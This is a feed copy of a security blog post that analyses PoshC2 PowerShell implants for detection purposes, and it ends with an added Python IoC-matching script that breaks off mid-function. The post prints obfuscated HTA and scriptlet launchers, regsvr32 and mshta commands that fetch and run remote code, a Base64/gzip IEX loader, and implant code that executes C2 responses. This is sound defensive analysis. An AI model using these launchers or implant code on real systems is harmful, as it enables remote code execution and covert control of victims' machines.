Docker. Once configured and executed, it generates over 100 modifications of fresh implants, written in PowerShell, C#, and Python. The framework has a modular architecture to enable users to add their own modules and tools. 
It is no wonder that nowadays PoshC2 is one of the most … <a href="https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html">Continued</a></p> <p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html">How to Detect PoshC2 PowerShell Implants</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </description> <content:encoded> <![CDATA[ <div><img width="300" height="157" src="https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-300x157.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/ ]]> <![CDATA[ files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-300x157.png 300w, https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-1024x535.png 1024w, https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-768x402.png 768w, https://blogs.vmware.co ]]> <![CDATA[ m/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4-600x314.png 600w, https://blogs.vmware.com/security/files/2021/04/VMWCB-BlogFeature-PowershellRSP-02-4.png 1201w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><span data-contrast="auto">PoshC2 is a proxy-aware cross-platform C2 fram ]]> <![CDATA[ ework that natively supports Docker. Once configured and executed</span><b><span data-contrast="auto">, </span></b><span data-contrast="auto">it generates over 100 modifications of fresh implants, written in PowerShell, C#, and Python. The framework has a modular architecture to enable users to ad ]]> <![CDATA[ d their own modules and tools. 
It is no wonder that nowadays PoshC2 is </span><a href="https://twitter.com/teamcymru_s2/status/1604091964386705409"><span data-contrast="none">one of the</span></a><span data-contrast="auto"> most popular C2 frameworks, and it is routinely used to aid penetration testers w ]]> <![CDATA[ ith red teaming, post-exploitation, and lateral movement capabilities.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="auto">In May 2020, Nettitude, the creator and maintainer of PoshC2, </span><a hre ]]> <![CDATA[ f="https://labs.nettitude.com/blog/introducing-poshc2-v6-0/"><span data-contrast="none">released</span></a><span data-contrast="auto"> the 6</span><span data-contrast="auto">th</span><span data-contrast="auto"> version of the framework. Shortly thereafter, Nettitude also </span><a href="https://labs ]]> <![CDATA[ .nettitude.com/blog/detecting-poshc2-indicators-of-compromise/"><span data-contrast="none">published</span></a><span data-contrast="auto"> techniques that could be used to detect its footprint, including communication of the implant with the backend, the behavior of the implant during execution, and ]]> <![CDATA[ its static fingerprint. What it did not include, however, was an investigation of the delivery methods using proxy tools such as regsvr32.exe or mshta.exe and details of the underlying implementation. In this blog post, we plan to fill this gap by looking into the details of the PowerShell implant ]]> <![CDATA[ generation phase; we will detail the main implementations and conclude with some detection suggestions.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <h2 aria-level="1"><span data-contrast="none">Generation of PowerShell Impl ]]> <![CDATA[ ants</span></h2> <p><span data-contrast="auto">As with any other C2 framework, generating an implant is a process that is tightly coupled with configuring the server. 
In PoshC2, the user bootstraps the process using the commands </span><i><span data-contrast="auto">posh-project -n project-name</span ]]> <![CDATA[ ></i><span data-contrast="auto">, </span><i><span data-contrast="auto">posh-config project-name,</span></i><span data-contrast="auto"> and </span><i><span data-contrast="auto">posh-server.</span></i><span data-contrast="auto"> </span><span data-ccp-props="{"201341983":0,"335559739&qu ]]> <![CDATA[ ot;:160,"335559740":259}"> </span></p> <p><span data-contrast="auto">The command</span><i><span data-contrast="auto"> posh-config</span></i><span data-contrast="auto"> opens the configuration file for editing (default configuration can be seen in </span><span data-contrast="auto">Figure 1 ]]> <![CDATA[ </span><span data-contrast="auto">), which allows setting up many parameters, including </span><i><span data-contrast="auto">PayloadCommsHost</span></i><span data-contrast="auto">, which contains a list of C2 addresses that the server would listen on. 
For convenience, we will be querying the gener ]]> <![CDATA[ ated backend URLs on the same host as the server; therefore, we will use the default value </span><i><span data-contrast="auto">https://127.0.0.1</span></i><span data-contrast="auto"> as the C2 URL.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":2 ]]> <![CDATA[ 59}"> </span></p> <p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83406" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-1024x579.png" alt ]]> <![CDATA[ ="" width="800" height="452" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-1024x579.png 1024w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-300x170.png 300w, https://blogs.vmware.com/security/files/2023/03/Scree ]]> <![CDATA[ n-Shot-2023-03-24-at-11.57.49-AM-768x434.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-1536x868.png 1536w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM-600x339.png 600w, https://blogs.vmware.com/security/files ]]> <![CDATA[ /2023/03/Screen-Shot-2023-03-24-at-11.57.49-AM.png 1610w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i><span data-contrast="none">Figure </span></i><i><span data-contrast="none">1</span></i><i><span data-contrast="none">: Configuration file, opened by posh-config.</span></i><span data-cc ]]> <![CDATA[ p-props="{"201341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p> <p><span data-contrast="auto">The command</span><i><span data-contrast="auto"> posh-server</span></i><span data-contrast="auto">, as the name suggests ]]> <![CDATA[ , starts the server. 
This command also generates over 100 modifications of payloads, which are dropped in /var/poshc2/project-name/payloads.</span></p> <p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM.png"><img decoding="async" loading="lazy" class="a ]]> <![CDATA[ lignnone wp-image-83407" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-1024x771.png" alt="" width="800" height="603" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-1024x771.png 1024w, https://blogs.vmware.com ]]> <![CDATA[ /security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-300x226.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-768x578.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-1536x1157.png 1536w, https://b ]]> <![CDATA[ logs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM-600x452.png 600w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-11.59.22-AM.png 1596w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><em><span class="TextRun SCXW172436151 BCX2" lang="EN- ]]> <![CDATA[ US" xml:lang="EN-US" data-contrast="none"><span class="NormalTextRun SCXW172436151 BCX2" data-ccp-parastyle="caption">Figure </span></span><span class="FieldRange SCXW172436151 BCX2"><span class="TextRun SCXW172436151 BCX2" lang="EN-US" xml:lang="EN-US" data-contrast="none"><span class="NormalTextRu ]]> <![CDATA[ n SCXW172436151 BCX2" data-ccp-parastyle="caption">2</span></span></span><span class="TextRun SCXW172436151 BCX2" lang="EN-US" xml:lang="EN-US" data-contrast="none"><span class="NormalTextRun SCXW172436151 BCX2" data-ccp-parastyle="caption">: </span><span class="NormalTextRun SCXW172436151 BCX2" dat ]]> <![CDATA[ a-ccp-parastyle="caption">PoshC2 suggests different methods of execution of a PowerShell implant, created by the posh-server 
command.</span></span></em></p> <p><span data-contrast="auto">As shown in </span><span data-contrast="auto">Figure 2</span><span data-contrast="auto">, PoshC2 suggests six dif ]]> <![CDATA[ ferent methods for executing a PowerShell implant: (1) straight from the disk, after renaming the raw implant (stored by PoshC2 in payload.txt) and changing the extension to .ps1; (2) passed to PowerShell as a command line argument (using the file payload.bat generated by PoshC2); (3) delivered via ]]> <![CDATA[ a short PowerShell one-liner; (4) executed by mshta.exe as an HTA payload; (5) as a scriptlet pulled from the Internet by regsvr32.exe; or (6), again, executed by mshta.exe, but in this instance with the help of an inline VBScript.</span><span data-ccp-props="{"201341983":0,"335559739& ]]> <![CDATA[ quot;:160,"335559740":259}"> </span></p> <h2 aria-level="1"><span data-contrast="none">Execution via Proxy Tools</span></h2> <p><span data-contrast="auto">Using Living Off the Land Binaries (LOLBins), e.g., mshta.exe and regsvr32.exe, is a widely adopted MITRE ATT&CK technique (</span><a href="h ]]> <![CDATA[ ttps://attack.mitre.org/techniques/T1218/"><span data-contrast="none">T1218</span></a><span data-contrast="auto">) often used to break the malware delivery process into a chain of events designed to hinder detection. PoshC2 can, for example, rely on mshta.exe to proxy the execution of malicious VBS ]]> <![CDATA[ cripts, JScripts, and PowerShell scripts. The technique is implemented by generating a file called Launcher.hta. 
This file features obfuscated strings (“Wscript.Shell” is split into chunks for example) and a Base64-encoded PowerShell implant, both simple yet effective techniques to bypass static ]]> <![CDATA[ detection: </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><strong><i><script></i></strong></p> <p><strong><i>ao=new ActiveXObject(“W”+”S”+”cr”+”ip”+”t.” ]]> <![CDATA[ +”Sh”+”e”+”l”+”l”);</i></strong></p> <p><strong><i>ao.run(‘powershell -exec bypass -Noninteractive -windowstyle hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUg</i><i>BlAGEA</i></strong></p> <p><strong><i>ZABlAHIAKAAoA ]]> <![CDATA[ E4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMA</i></strong></p> <p><strong><i><…></i></strong></p> <p><strong><i>G0AcAByAGUAcwBzACkAKQAsAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdA</i></strong></p> <p><strong><i>DoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQ ]]> <![CDATA[ AKAApAA==’, 0);window.close();</i></strong></p> <p><strong><i></script></i></strong><span data-ccp-props="{"201341983":0,"335559685":720,"335559739":0,"335559740":240}"> </span></p> <p><span data-contrast="auto">Execution of powershell.exe with lo ]]> <![CDATA[ ng arguments (in our case the Base64-encoded implant is more than 6000 characters long) should be considered a strong indicator of suspicious activity. </span><span data-ccp-props="{"201341983":0,"335559739":0,"335559740":240}"> </span></p> <p><span data-contrast="aut ]]> <![CDATA[ o">Malicious HTA files can also be executed through an inline script. 
This hides the code of the implant and thereby also reduces the risk of a signature able to target it:</span></p>
<p><strong><i>mshta.exe 'vbscript:GetObject("script:https://127.0.0.1/Philips/v902/_cs")(window.close)'</i></strong></p>
<p>In comparison to Launcher.hta, the code of the HTA payload, retrieved by the inline VBScript, relies on the <i>Shell.Application</i> ActiveX object rather than <i>Wscript.Shell</i>; also, tags like <i>Scriptlet</i> and <i>Script</i> are now mangled; however, the same PowerShell Base64-encoded command to execute the implant is used. All these techniques, again, are employed to make static analysis more difficult:</p>
<p><strong><i>john@ubuntu:~$ curl -k https://127.0.0.1/Philips/v902/_cs</i></strong></p>
<p><strong><i><sCrIptlEt><scRIPt></i></strong></p>
<p><strong><i>a=new ActiveXObject("Shell.Application").ShellExecute("powershell.exe"," -exec bypass -Noninteractive -windowstyle hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZ</i></strong></p>
<p><strong><i>QBhAG0AUgBlAGEAZABlAHIAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTA</i></strong></p>
<p><strong><i>HkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMA</i></strong></p>
<p><strong><i><…></i></strong></p>
<p><strong><i>G0AcAByAGUAcwBzACkAKQAsAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBB</i></strong></p>
<p><strong><i>AFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApAA==","","open","0");</i></strong></p>
<p><strong><i></scRIPt></sCrIptlEt></i></strong></p>
<p>Another method to proxy PowerShell execution is to use regsvr32.exe in combination with scrobj.dll, as shown below.</p>
<p><strong><i>regsvr32 /s /n /u /i:https://127.0.0.1/Philips/v902/_rg scrobj.dll</i></strong></p>
<p>Loaded by regsvr32.exe, scrobj.dll will download and execute the scriptlet, hosted by the server component of PoshC2. This scriptlet uses the <i>Shell.Application</i> ActiveX object to execute powershell.exe with the Base64-encoded implant execution command passed as an argument:</p>
<p><strong><i>john@ubuntu:~$ curl -k https://127.0.0.1/Philips/v902/_rg</i></strong></p>
<p><strong><i><?XML version="1.0"?></i></strong></p>
<p><strong><i><scriptlet></i></strong></p>
<p><strong><i><registration</i></strong></p>
<p><strong><i> progid="PoC"</i></strong></p>
<p><strong><i> classid="{F0001111-0000-0000-0000-0000FEEDACDC}" ></i></strong></p>
<p><strong><i><script language="VBScript"></i></strong></p>
<p><strong><i>Dim ghgfhgfh</i></strong></p>
<p><strong><i>set ghgfhgfh = CreateObject("shell.application")</i></strong></p>
<p><strong><i>ghgfhgfh.ShellExecute "powershell.exe", " -exec bypass -Noninteractive -windowstyle hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUg</i></strong></p>
<p><strong><i>BlAGEAZABlAHIAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEM</i></strong></p>
<p><strong><i><…></i></strong></p>
<p><strong><i>GQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQAsAFsAVABlAHgAdAAuAEU</i></strong></p>
<p><strong><i>AbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApAA==", "", "open", 0</i></strong></p>
<p><strong><i></script></i></strong></p>
<p><strong><i></registration></i></strong></p>
<p><strong><i></scriptlet></i></strong></p>
<p>Both the HTA code and the scriptlet feature the same powershell.exe command line parameters, including the Base64-encoded PowerShell command that ultimately executes the implant. PoshC2 stores the whole command line inside payload.bat, which can be either executed on a remote system as-is or become part of a bigger execution chain. The Base64-encoded PowerShell command contains another layer of obfuscation – another Base64-encoded PowerShell script that is also packed:</p>
<p><strong><i>IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String('H4sIAIec/GMC/51XW3PayBJ+16+YVekBJUhc4mDHFFVry2RNObYpIM7uUq6tQWpggpCU0SiYZfnv2z0jLnE2l</i></strong></p>
<p><strong><i><…></i></strong></p>
<p><strong><i>BXQg3I0aEY9pesli2Yz5M7+vtHe35Xg7s9DxaXyhjFAZtQdpJTKzf8XrGmEUKjMjm4dy9ta/wJPgY69ig4AAA=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()</i></strong></p>
<p>The packed code is the main PowerShell implant (which can be found inside payload.txt). Before diving into the details of its implementation, there is one last delivery method to analyze: the PowerShell stager.</p>
<h2 aria-level="1">Execution via PowerShell Stagers</h2>
<p>Similarly to the inline scripts used with mshta.exe and regsvr32.exe, PoshC2 provides a short PowerShell one-liner to download and execute the main PowerShell implant. As Figure 3 highlights, most of the Base64-encoded command does not change at all, which makes it a perfect candidate for a detection rule.</p>
<p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83408" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-1024x159.png" alt="" width="800" height="124" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-1024x159.png 1024w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-300x47.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-768x119.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM-600x93.png 600w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.49.44-PM.png 1506w" sizes="(max-width: 800px) 100vw, 800px" /></a></p>
<p><i>Figure 3: Two different builds of the PowerShell one-liner.</i></p>
<p>The Base64-encoded command employs <i>System.Net.WebClient</i> to download the main PowerShell implant, which is later executed with the <i>IEX</i> command. As shown in the figure below, the URL is the only parameter that is responsible for the changes in the Base64 encoding.</p>
<p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83409" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-1024x66.png" alt="" width="800" height="52" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-1024x66.png 1024w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-300x19.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-768x49.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-1536x99.png 1536w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-2048x132.png 2048w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.56.48-PM-600x39.png 600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p>
<p><i>Figure 4: Two different builds of the PowerShell one-liner (decoded Base64 command).</i></p>
<p>PoshC2 replies with the Base64-encoded payload.txt to every download attempt coming from the one-liner:</p>
<p><strong><i>john@ubuntu:~$ curl -k https://127.0.0.1/Philips/v902/_rp</i></strong></p>
<p><strong><i>W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlcnZlckNlcnRpZmljYXRlVmFsaWRhd</i></strong></p>
<p><strong><i>GlvbkNhbGxiYWNrID0geyR0cnVlfQokZGY9QCgiIikKJGg9IiIKJHNjPSIiCiR1cmxzPUAoImh0dHBzOi8v</i></strong></p>
<p><strong><i><…></i></strong></p>
<p><strong><i>1pdCAtMTsKICAgICAgICBwcmltZXJzCiAgICAgICAgU3RhcnQtU2xlZXAgJHdhaXQKICAgICAgICAk</i></strong></p>
<p><strong><i>d2FpdCA9ICR3YWl0ICogMjsKICAgIH0KfQplbHNlCnsKICAgIHByaW1lcnMKfQo=</i></strong></p>
<h2 aria-level="1">The PowerShell Implant</h2>
<p>Full analysis of the main implant (e5f2b83f05f6210410f52d59ef50357a55dc2af5) reveals the following details (as a reminder, PoshC2 stores the non-obfuscated PowerShell implant inside payload.txt). First off, the code disables certificate verification (as the attackers often use self-signed SSL certificates, another common indicator of compromise). It also contains a list of C2 URLs and a URI:</p>
<p><strong><i>[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}</i></strong></p>
<p><strong><i>$df=@("")</i></strong></p>
<p><strong><i>$h=""</i></strong></p>
<p><strong><i>$sc=""</i></strong></p>
<p><strong><i>$urls=@("https://127.0.0.1")</i></strong></p>
<p><strong><i>$curl="/cisben/marketq/"</i></strong></p>
<p><strong><i>$s=$urls[0]</i></strong></p>
<p>The URI, stored in <i>$curl</i>, is randomly taken from the file PoshC2/resources/urls.txt (shown in Figure 5). The presence of one of these strings in the URL is another indicator of compromise that can be used by a detection rule.</p>
<p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83410" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-888x1024.png" alt="" width="800" height="922" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-888x1024.png 888w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-260x300.png 260w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-768x886.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM-600x692.png 600w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-12.59.48-PM.png 1006w" sizes="(max-width: 800px) 100vw, 800px" /></a></p>
<p><i>Figure 5: Set of rotated URIs.</i></p>
<p>Interaction between the implant and the server is encrypted with AES, and the resulting byte stream is further encoded in Base64. The implant has three functions to perform encryption – <i>CAM</i> (initializes the crypto provider), <i>ENC</i> (encrypts data), and <i>DEC</i> (decrypts data):</p>
<p><strong><i>function CAM ($key,$IV){</i></strong></p>
<p><strong><i>try {$a = New-Object "System.Security.Cryptography.RijndaelManaged"</i></strong></p>
<p><strong><i>} catch {$a = New-Object "System.Security.Cryptography.AesCryptoServiceProvider"}</i></strong></p>
<p><strong><i>$a.Mode = [System.Security.Cryptography.CipherMode]::CBC</i></strong></p>
<p><strong><i>$a.Padding = [System.Security.Cryptography.PaddingMode]::Zeros</i></strong></p>
<p><strong><i>$a.BlockSize = 128</i></strong></p>
<p><strong><i>$a.KeySize = 256</i></strong></p>
<p><strong><i>if ($IV)</i></strong></p>
<p><strong><i>{</i></strong></p>
<p><strong><i>if ($IV.getType().Name -eq "String")</i></strong></p>
<p><strong><i>{$a.IV = [System.Convert]::FromBase64String($IV)}</i></strong></p>
<p><strong><i>else</i></strong></p>
<p><strong><i>{$a.IV = $IV}</i></strong></p>
<p><strong><i>}</i></strong></p>
<p><strong><i>if ($key)</i></strong></p>
<p><strong><i>{</i></strong></p>
<p><strong><i>if ($key.getType().Name -eq "String")</i></strong></p>
<p><strong><i>{$a.Key = [System.Convert]::FromBase64String($key)}</i></strong></p>
<p><strong><i>else</i></strong></p>
<p><strong><i>{$a.Key = $key}</i></strong></p>
<p><strong><i>}</i></strong></p>
<p><strong><i>$a}</i></strong></p>
<p><strong><i>function ENC ($key,$un){</i></strong></p>
<p><strong><i>$b = [System.Text.Encoding]::UTF8.GetBytes($un)</i></strong></p>
<p><strong><i>$a = CAM $key</i></strong></p>
<p><strong><i>$e = $a.CreateEncryptor()</i></strong></p>
<p><strong><i>$f = $e.TransformFinalBlock($b, 0, $b.Length)</i></strong></p>
<p><strong><i>[byte[]] $p = $a.IV + $f</i></strong></p>
<p><strong><i>[System.Convert]::ToBase64String($p)</i></strong></p>
<p><strong><i>}</i></strong></p>
<p><strong><i>function DEC ($key,$enc){</i></strong></p>
<p><strong><i>$b = [System.Convert]::FromBase64String($enc)</i></strong></p>
<p><strong><i>$IV = $b[0..15]</i></strong></p>
<p><strong><i>$a = CAM $key $IV</i></strong></p>
<p><strong><i>$d = $a.CreateDecryptor()</i></strong></p>
<p><strong><i>$u = $d.TransformFinalBlock($b, 16, $b.Length - 16)</i></strong></p>
<p><strong><i>[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($u).Trim([char]0)))}</i></strong></p>
<p>After sending a request to the C2 server, the implant decrypts the response stored in <i>$primern</i> and checks it for the presence of the “*key*” string. If the string is present, then the code executes the received PowerShell code with the help of <i>iex</i> (an alias for the <i>Invoke-Expression</i> cmdlet):</p>
<p><strong><i>$primern = (Get-Webclient -Cookie $pp).downloadstring($script:s)</i></strong></p>
<p><strong><i>$p = dec -key KgVKnyH0ZlTk8KlGhp6XpWOY7i6IS+K47yuVBY0/xR4= -enc $primern</i></strong></p>
<p><strong><i>if ($p -like "*key*") {$p| iex}</i></strong></p>
<p>The combination of specific functions and strings used in the code (e.g., ServerCertificateValidationCallback, AesCryptoServiceProvider, FromBase64String, ToBase64String, System.Net.WebProxy, *key*, System.Net.WebClient) creates a unique fingerprint that can be used to detect the implant.</p>
<p>Every build of a PowerShell implant updates three parameters: URI, encryption key, and decryption key (see Figure 6).</p>
<p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83411" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-1024x463.png" alt="" width="800" height="362" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-1024x463.png 1024w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-300x136.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-768x347.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-1536x695.png 1536w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM-600x271.png 600w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.03.01-PM.png 1910w" sizes="(max-width: 800px) 100vw, 800px" /></a></p>
<p><i>Figure 6: URI and network keys change after each build.</i></p>
<p>While the encryption keys are generated on the fly, the URI, as mentioned earlier, is randomly taken from the file PoshC2/resources/urls.txt (see Figure 5). These few changes in the source code cause a drastic effect on the Base64-encoded PowerShell command, as the output of the KDiff3 tool highlights in Figure 7.</p>
<p><a href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83412" src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-1024x464.png" alt="" width="800" height="362" srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-1024x464.png 1024w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-300x136.png 300w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-768x348.png 768w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-1536x696.png 1536w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-600x272.png 600w, https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM.png 1886w" sizes="(max-width: 800px) 100vw, 800px" /></a></p>
<p><em>Figure 7: Two different builds of the payload.bat file with the same configuration, but different crypto keys and URI.</em></p>
<p>The beginning of the Base64-encoded code in payload.bat, however, is bound to remain the same, making it a suitable candidate for a detection signature. When decoded, that fragment corresponds to the following PowerShell code:</p>
<p><strong><i>IEX(New-Object IO.StreamReader((New-Object System.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String('</i></strong></p>
<h2 aria-level="1">Conclusions</h2>
<p><span data-contrast="auto">In this blog post, we showed how to use PoshC2 to generate PowerShell implants and stagers. We also explained how proxy tools (such as mshta.exe or regsvr32.exe) are often used to further increase the complexity of the delivery process, making detection a challenging task. 
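The IoCs discussed above (proxy execution through mshta.exe or regsvr32.exe, a long Base64 argument after -e, the constant loader prefix in payload.bat, the implant's fingerprint strings and the rotated URIs) can be checked over process command lines. The Python below is an added example written for this page, not VMware TAU's YARA rules; the 500-character length threshold, the two URI values (taken from the sample build shown above rather than the full urls.txt) and the sample command lines it is run on are constructed assumptions.

```python
import base64
import gzip
import re

# Constant decoded prefix of every payload.bat command quoted in the post.
STABLE_PREFIX = ("IEX(New-Object IO.StreamReader((New-Object System.IO.Compression."
                 "GzipStream([IO.MemoryStream][Convert]::FromBase64String('")
# Implant strings the post names as a combined fingerprint.
FINGERPRINT = ("ServerCertificateValidationCallback", "AesCryptoServiceProvider",
               "FromBase64String", "ToBase64String", "System.Net.WebProxy",
               "*key*", "System.Net.WebClient")
# URIs from the post's sample build; the full rotation set is PoshC2/resources/urls.txt.
KNOWN_URIS = ("/Philips/v902/", "/cisben/marketq/")
# powershell -e / -ec / -enc / -EncodedCommand followed by the Base64 blob.
ENC_FLAG = re.compile(r"\s-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{40,})", re.I)
MIN_B64_LEN = 500  # "long Base64-encoded command" IoC; this threshold is an assumption


def encoded_prefix(text):
    """Base64 of the UTF-16LE form of `text`, the encoding powershell -e expects.
    Trimmed to whole 3-byte groups so the result is a literal prefix of the
    encoding of any longer command that starts with `text`."""
    raw = text.encode("utf-16-le")
    raw = raw[: len(raw) - len(raw) % 3]
    return base64.b64encode(raw).decode()


# Starts with "SQBFAFgAKABOAGUAdwAt...", the constant beginning seen in payload.bat.
STABLE_PREFIX_B64 = encoded_prefix(STABLE_PREFIX)


def unpack_inner_script(decoded_cmd):
    """Pull the gzip+Base64 blob out of the decoded loader and inflate it."""
    m = re.search(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", decoded_cmd)
    if not m:
        return None
    try:
        return gzip.decompress(base64.b64decode(m.group(1))).decode("ascii", "replace")
    except (OSError, ValueError):
        return None


def analyze(cmdline):
    """Score one process command line against the post's PoshC2 IoCs."""
    r = {"proxy_binary": None, "long_encoded": False, "stable_prefix": False,
         "fingerprints": [], "known_uris": [], "inner_script": None}
    low = cmdline.lower()
    if "mshta" in low and "vbscript:getobject" in low:
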